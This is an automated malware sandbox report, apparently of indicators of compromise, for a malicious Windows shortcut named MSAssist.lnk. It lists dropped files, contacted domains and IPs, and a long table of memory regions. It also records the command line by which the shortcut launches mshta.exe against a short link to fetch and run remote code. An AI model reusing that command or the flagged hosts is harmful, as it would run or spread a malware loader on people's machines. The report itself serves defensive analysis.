IOC Report
MSAssist.lnk

loading gif

Files

File Path
Type
Category
Malicious
MSAssist.lnk
MS Windows shortcut, Item id list present, Has Relative path, Has command line arguments, ctime=Sun Dec 31 23:06:32 1600, mtime=Sun Dec 31 23:06:32 1600, atime=Sun Dec 31 23:06:32 1600, length=0, window=hidenormalshowminimized
initial sample
malicious
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\WJ8I2OL4\35FlWc2[1].htm
HTML document, ASCII text
dropped

Processes

Path
Cmdline
Malicious
C:\Windows\System32\mshta.exe
"C:\WINDOWS\system32\mshta.exe" https://bit.ly/35FlWc2

URLs

Name
IP
Malicious
https://page.googledocpage.com/I
unknown
malicious
https://page.googledocpage.com/
unknown
malicious
https://page.googledocpage.com/U
unknown
malicious
https://page.googledocpage.com/WiU
unknown
malicious
https://page.googledocpage.com/z
unknown
malicious
https://bit.ly/35FlWc2C:
unknown
https://bit.ly/35FlWc2r
unknown
https://bit.ly/35FlWc2S
unknown
https://bit.ly/35FlWc2aHOMEDRIVE
unknown
https://bit.ly/35FlWc2B
unknown
https://bit.ly/35FlWc2
67.199.248.10
https://bit.ly/
unknown
https://bit.ly/35FlWc2...
unknown
https://bit.ly/r3
unknown
There are 4 hidden URLs, click here to show them.

Domains

Name
IP
Malicious
bit.ly
67.199.248.10
page.googledocpage.com
unknown

IPs

IP
Domain
Country
Malicious
67.199.248.10
bit.ly
United States

Memdumps

Base Address
Regiontype
Protect
Malicious
1D70545C000
heap
page read and write
1D66DAA0000
trusted library allocation
page read and write
2088F918000
heap
page read and write
1CB58202000
heap
page read and write
1D705463000
heap
page read and write
1D66C05F000
heap
page read and write
1BDAC029000
heap
page read and write
1D66C065000
heap
page read and write
1CB58880000
trusted library allocation
page read and write
26EB8C77000
heap
page read and write
1D705400000
heap
page read and write
7AC61FB000
stack
page read and write
1ACE7ED0000
heap
page read and write
1D66D97C000
trusted library allocation
page read and write
26EB8D8E000
heap
page read and write
1BDAC900000
heap
page read and write
1D705465000
heap
page read and write
1CB58200000
heap
page read and write
1DE6E2EF000
heap
page read and write
26EB8C3C000
heap
page read and write
1DE6E2EE000
heap
page read and write
26EB9270000
trusted library allocation
page read and write
DE6AFFF000
stack
page read and write
2088F7F0000
remote allocation
page read and write
1DE6E2CB000
heap
page read and write
26EB9502000
heap
page read and write
23820E02000
trusted library allocation
page read and write
7AC6A7D000
stack
page read and write
2088F840000
heap
page read and write
DE6B0FE000
stack
page read and write
1D66D968000
trusted library allocation
page read and write
1ACE7E70000
heap
page read and write
1D705484000
heap
page read and write
26EB8DE5000
heap
page read and write
93E377B000
stack
page read and write
371DFFE000
stack
page read and write
1D66C1B5000
heap
page read and write
3C2AB7E000
stack
page read and write
26EB9627000
heap
page read and write
1D66D9E4000
trusted library allocation
page read and write
43D7CFF000
stack
page read and write
2088F857000
heap
page read and write
26EB8A90000
heap
page read and write
1BDAC089000
heap
page read and write
2088F889000
heap
page read and write
26EB95BC000
heap
page read and write
1CB58313000
heap
page read and write
1D66BF20000
heap
page read and write
1DE6E2D8000
heap
page read and write
26EB95C8000
heap
page read and write
1DE6E1CF000
heap
page read and write
DE6B1FE000
stack
page read and write
1D66D9B8000
trusted library allocation
page read and write
1D70546A000
heap
page read and write
2088F82A000
heap
page read and write
1D66DA1C000
trusted library allocation
page read and write
1D7052F0000
heap
page read and write
83E7AFF000
stack
page read and write
1DE6E2E1000
heap
page read and write
DE6A97B000
stack
page read and write
2088F848000
heap
page read and write
1D66BF70000
trusted library allocation
page read and write
3C2A77C000
stack
page read and write
1DE6E170000
remote allocation
page read and write
1D705447000
heap
page read and write
1BDAC0BB000
heap
page read and write
26EB8A80000
heap
page read and write
1D66DA04000
trusted library allocation
page read and write
26EB8C29000
heap
page read and write
1D705460000
heap
page read and write
1D66C070000
heap
page read and write
23820470000
heap
page read and write
1D66D96C000
trusted library allocation
page read and write
1D705461000
heap
page read and write
23820602000
heap
page read and write
1D705496000
heap
page read and write
1ACE8000000
heap
page read and write
1D705413000
heap
page read and write
1DE6E1B9000
heap
page read and write
1ACE8029000
heap
page read and write
DE6A50C000
stack
page read and write
26EB8C2C000
heap
page read and write
1BDABEE0000
heap
page read and write
1D66C1B0000
heap
page read and write
1D705502000
heap
page read and write
E84D279000
stack
page read and write
23820629000
heap
page read and write
1D705426000
heap
page read and write
1D705459000
heap
page read and write
1D705455000
heap
page read and write
1D66C0CE000
heap
page read and write
1DE6E2EF000
heap
page read and write
1D705390000
trusted library allocation
page read and write
1DE6E2EF000
heap
page read and write
2088F862000
heap
page read and write
26EB9600000
heap
page read and write
93E387F000
stack
page read and write
1D66C0C9000
heap
page read and write
26644FC0000
heap
page read and write
1DE6E1B5000
heap
page read and write
810E7E000
stack
page read and write
1D66BF00000
heap
page read and write
1D66BFB7000
heap
page read and write
93E3A7C000
stack
page read and write
1BDABED0000
heap
page read and write
1D66C07E000
heap
page read and write
1CB58264000
heap
page read and write
1BDAC0CC000
heap
page read and write
1BDAC06F000
heap
page read and write
1D66D988000
trusted library allocation
page read and write
7AC66FE000
stack
page read and write
1DE6E2EF000
heap
page read and write
2088F5B0000
heap
page read and write
1D705C02000
trusted library allocation
page read and write
E84D5FF000
stack
page read and write
83E7BFD000
stack
page read and write
1D705464000
heap
page read and write
2088F7B0000
trusted library allocation
page read and write
26EB9500000
heap
page read and write
371DD7E000
stack
page read and write
7AC68FD000
stack
page read and write
1CB580C0000
heap
page read and write
1D66D970000
trusted library allocation
page read and write
1DE6E2EE000
heap
page read and write
1CB58300000
heap
page read and write
26EB8C13000
heap
page read and write
26EB8C88000
heap
page read and write
26EB8C79000
heap
page read and write
2088F740000
trusted library allocation
page read and write
1ACE7FD0000
trusted library allocation
page read and write
1BDAC023000
heap
page read and write
1D705458000
heap
page read and write
1CB58268000
heap
page read and write
1BDAC067000
heap
page read and write
1D705467000
heap
page read and write
26645200000
heap
page read and write
1D66DB54000
heap
page read and write
1D66D9C1000
trusted library allocation
page read and write
1DE6E1BC000
heap
page read and write
E84D47A000
stack
page read and write
26645213000
heap
page read and write
1D66C078000
heap
page read and write
1D66BFC5000
heap
page read and write
DE6ADFD000
stack
page read and write
1D66C017000
heap
page read and write
1DE6E1C7000
heap
page read and write
E84D0FE000
stack
page read and write
1DE6E2DA000
heap
page read and write
2088F913000
heap
page read and write
E84D57F000
stack
page read and write
371DEFE000
stack
page read and write
26EB8C94000
heap
page read and write
2088F858000
heap
page read and write
26645257000
heap
page read and write
1DE6E170000
remote allocation
page read and write
83E6F08000
stack
page read and write
2382065A000
heap
page read and write
266457C0000
remote allocation
page read and write
1D66D9F0000
trusted library allocation
page read and write
23820600000
heap
page read and write
1D66D990000
trusted library allocation
page read and write
2088F900000
heap
page read and write
371DC7C000
stack
page read and write
1D70547B000
heap
page read and write
1D66BFE6000
heap
page read and write
93E397E000
stack
page read and write
1DE6E2DA000
heap
page read and write
1D66D9FC000
trusted library allocation
page read and write
23820654000
heap
page read and write
1DE6DF44000
heap
page read and write
3C2AE7E000
stack
page read and write
1D70544D000
heap
page read and write
371E0FE000
stack
page read and write
1DE6E1BF000
heap
page read and write
1CB5827B000
heap
page read and write
1DE6E2DA000
heap
page read and write
1D705477000
heap
page read and write
1D70546D000
heap
page read and write
93E35FC000
stack
page read and write
26EB9543000
heap
page read and write
1D66BFB0000
heap
page read and write
23820665000
heap
page read and write
3C2AA7F000
stack
page read and write
26EB8C6C000
heap
page read and write
1D66D978000
trusted library allocation
page read and write
26EB95B0000
heap
page read and write
1BDAC102000
heap
page read and write
1DE6E2EF000
heap
page read and write
1DE6E1E2000
heap
page read and write
83E76FE000
stack
page read and write
1DE6E2A2000
heap
page read and write
1DE6E2EF000
heap
page read and write
26EB8C00000
heap
page read and write
1D66C090000
heap
page read and write
1CB58213000
heap
page read and write
1D70546B000
heap
page read and write
1D66C0A2000
heap
page read and write
83E7CFF000
stack
page read and write
2088F800000
heap
page read and write
1D66D9A8000
trusted library allocation
page read and write
1D705456000
heap
page read and write
1DE6E30A000
heap
page read and write
1DE6E2C4000
heap
page read and write
1D705441000
heap
page read and write
DE6B2FF000
stack
page read and write
2088F858000
heap
page read and write
26644FD0000
heap
page read and write
2088F7F0000
remote allocation
page read and write
1ACE8102000
heap
page read and write
43D7BFE000
stack
page read and write
26EB9554000
heap
page read and write
1D705432000
heap
page read and write
1D66D9EC000
trusted library allocation
page read and write
E84D1FC000
stack
page read and write
1BDAC000000
heap
page read and write
1ACE803E000
heap
page read and write
371DCFE000
stack
page read and write
1D66C09A000
heap
page read and write
26EB95C1000
heap
page read and write
1D705440000
heap
page read and write
23820675000
heap
page read and write
93E347F000
stack
page read and write
1CB58228000
heap
page read and write
83E75FA000
stack
page read and write
23820702000
heap
page read and write
2088F802000
heap
page read and write
26EB9402000
heap
page read and write
1D66C09C000
heap
page read and write
3C2AF7C000
stack
page read and write
1DE6E170000
heap
page read and write
266457C0000
remote allocation
page read and write
20891202000
trusted library allocation
page read and write
26EB9623000
heap
page read and write
26EB8C40000
heap
page read and write
1DE6E2E1000
heap
page read and write
1CB58A02000
trusted library allocation
page read and write
26EB8C55000
heap
page read and write
1D705360000
heap
page read and write
43D7AF9000
stack
page read and write
1DE6E280000
heap
page read and write
1ACE8044000
heap
page read and write
1D66DB50000
heap
page read and write
26EB9592000
heap
page read and write
1DE6E2F9000
heap
page read and write
1DE6E1F8000
heap
page read and write
26EB8C8B000
heap
page read and write
1DE6E1D5000
heap
page read and write
26EB8C6F000
heap
page read and write
1D66C0B4000
heap
page read and write
1BDABF70000
trusted library allocation
page read and write
1DE6E30A000
heap
page read and write
81107E000
stack
page read and write
3C2A3AC000
stack
page read and write
1D66D9D0000
trusted library allocation
page read and write
810F7E000
stack
page read and write
1BDAC0C3000
heap
page read and write
1ACE803B000
heap
page read and write
1DE6E2B1000
heap
page read and write
1DE6E2EF000
heap
page read and write
1D66D984000
trusted library allocation
page read and write
1CB580B0000
heap
page read and write
26EB9602000
heap
page read and write
26EB8BF0000
trusted library allocation
page read and write
26645030000
heap
page read and write
1D66DAD0000
heap
page read and write
1D705429000
heap
page read and write
1ACE8802000
trusted library allocation
page read and write
1D66DA60000
heap
page read and write
1D66D9B0000
trusted library allocation
page read and write
1DE703B0000
trusted library section
page readonly
83E7DFE000
stack
page read and write
2664523D000
heap
page read and write
DE6ACFE000
stack
page read and write
26EB9522000
heap
page read and write
93E357F000
stack
page read and write
2088F770000
trusted library allocation
page read and write
1D705475000
heap
page read and write
2382066F000
heap
page read and write
1ACE802F000
heap
page read and write
1D66D994000
trusted library allocation
page read and write
1DE6E2E3000
heap
page read and write
23820713000
heap
page read and write
26645790000
trusted library allocation
page read and write
2088F7F0000
remote allocation
page read and write
1DE6E1D3000
heap
page read and write
266457C0000
remote allocation
page read and write
371E1FF000
stack
page read and write
26EB8C66000
heap
page read and write
23820613000
heap
page read and write
1D66D9B4000
trusted library allocation
page read and write
1DE6E1B4000
heap
page read and write
1D705474000
heap
page read and write
26EB8D13000
heap
page read and write
1DE6E2E1000
heap
page read and write
1D66DA0C000
trusted library allocation
page read and write
7AC6B7D000
stack
page read and write
1D66D99C000
trusted library allocation
page read and write
1DE6E1C9000
heap
page read and write
2088F720000
trusted library allocation
page read and write
26EB9630000
heap
page read and write
7AC6BFE000
stack
page read and write
1DE6E1F3000
heap
page read and write
1D66BDC0000
heap
page read and write
238204E0000
heap
page read and write
1D66DA18000
trusted library allocation
page read and write
26EB956D000
heap
page read and write
1BDAC013000
heap
page read and write
1D66C094000
heap
page read and write
26EB8C5F000
heap
page read and write
810A7B000
stack
page read and write
7AC67FE000
stack
page read and write
1DE6E1CD000
heap
page read and write
1CB58302000
heap
page read and write
1DE6E2EF000
heap
page read and write
1ACE8052000
heap
page read and write
26645202000
heap
page read and write
1BDAC0C9000
heap
page read and write
93E36FC000
stack
page read and write
26645302000
heap
page read and write
1DE71552000
trusted library allocation
page read and write
26645224000
heap
page read and write
1BDABF40000
heap
page read and write
1D66DA08000
trusted library allocation
page read and write
1DE6E170000
remote allocation
page read and write
DE6ABFE000
stack
page read and write
2088F902000
heap
page read and write
DE6AAFC000
stack
page read and write
1BDAC113000
heap
page read and write
1ACE8041000
heap
page read and write
7AC697E000
stack
page read and write
1D70545A000
heap
page read and write
83E6F5F000
stack
page read and write
1DE6E1D1000
heap
page read and write
1D66D998000
trusted library allocation
page read and write
1DE6E2EF000
heap
page read and write
1D66D9C8000
trusted library allocation
page read and write
1CB58120000
heap
page read and write
1BDAC802000
heap
page read and write
3C2A97F000
stack
page read and write
238205E0000
trusted library allocation
page read and write
1D70547E000
heap
page read and write
1ACE8013000
heap
page read and write
1CB5825A000
heap
page read and write
1D70543B000
heap
page read and write
E84CF7A000
stack
page read and write
1D66D9BC000
trusted library allocation
page read and write
93E2ECC000
stack
page read and write
1D66DB5D000
heap
page read and write
1D66D9AC000
trusted library allocation
page read and write
3C2AC7C000
stack
page read and write
1D66D9A0000
trusted library allocation
page read and write
E84D67E000
stack
page read and write
1BDAC043000
heap
page read and write
2088F5C0000
heap
page read and write
83E7EFF000
stack
page read and write
1DE6E291000
heap
page read and write
1D705300000
heap
page read and write
26EB8DB9000
heap
page read and write
1CB58280000
heap
page read and write
26EB8C92000
heap
page read and write
26EB8AF0000
heap
page read and write
E84CB1B000
stack
page read and write
1D705462000
heap
page read and write
1D66D980000
trusted library allocation
page read and write
1D705442000
heap
page read and write
23820480000
heap
page read and write
93E32FB000
stack
page read and write
810D7B000
stack
page read and write
83E77FE000
stack
page read and write
7AC667E000
stack
page read and write
2382063D000
heap
page read and write
2088F872000
heap
page read and write
2088F847000
heap
page read and write
1ACE7E80000
heap
page read and write
1D70545F000
heap
page read and write
26645802000
trusted library allocation
page read and write
83E79FF000
stack
page read and write
E84D37F000
stack
page read and write
43D75AB000
stack
page read and write
1DE6E2E1000
heap
page read and write
1D70547A000
heap
page read and write
1ACE8002000
heap
page read and write
26EB9522000
heap
page read and write
1DE6DF40000
heap
page read and write
1D66D9D8000
trusted library allocation
page read and write
26EB9613000
heap
page read and write
93E3B7F000
stack
page read and write
1D66C0B0000
heap
page read and write
2088F813000
heap
page read and write
2088F848000
heap
page read and write
1DE6E2EF000
heap
page read and write
3C2AD7E000
stack
page read and write
23820665000
heap
page read and write
26645229000
heap
page read and write
1D70543D000
heap
page read and write
1CB58240000
heap
page read and write
DE6AEFE000
stack
page read and write
1D705457000
heap
page read and write
2088F620000
heap
page read and write
There are 389 hidden memdumps, click here to show them.